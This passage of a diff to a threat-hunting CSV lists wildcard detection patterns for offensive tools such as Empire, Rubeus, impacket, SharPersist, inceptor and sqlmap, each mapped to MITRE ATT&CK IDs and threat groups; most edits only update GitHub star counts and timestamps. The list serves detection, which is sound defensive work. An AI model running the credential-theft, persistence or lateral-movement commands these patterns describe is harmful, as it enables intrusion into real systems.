T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Target * -Shellcode *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -t donut *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t schtaskbackdoor *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"* -Target * -AllDomain *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -InitialGrooms *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -Shellcode *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --target=* --payload=*cmd.exe /c*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" -"* -target-domain * -outputfile * -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -target-domain * -outputfile * -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* targetedKerberoast.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --target-name * --domain * --dc-ip * --executable *.exe*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" "* targets-asn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1963,21 +1963,21 @@ "* targets-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --target-user * --dc-ip * -command *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" -"* tdotnet publish Athena *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"* tdotnet publish Athena *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "* teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"* teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "* telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* tgssub * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* tgtdeleg /nowrap*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgssub * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgtdeleg /nowrap*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* tgtdeleg /spn:cifs*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"* tgtdeleg /target:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* thc-hidra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"* tgtdeleg /target:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* thc-hidra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "* theHarvester.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"* --threads * scan --buckets-file* ","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"* --threads * scan --buckets-file* ","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "* ticketsplease.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* TikiLoader*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "* tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1987,71 +1987,71 @@ "* TokenStrip.c *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* TokenStripBOF.o *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* tokenvator *","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"* -Tokenvator -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* --tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -Tokenvator -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* 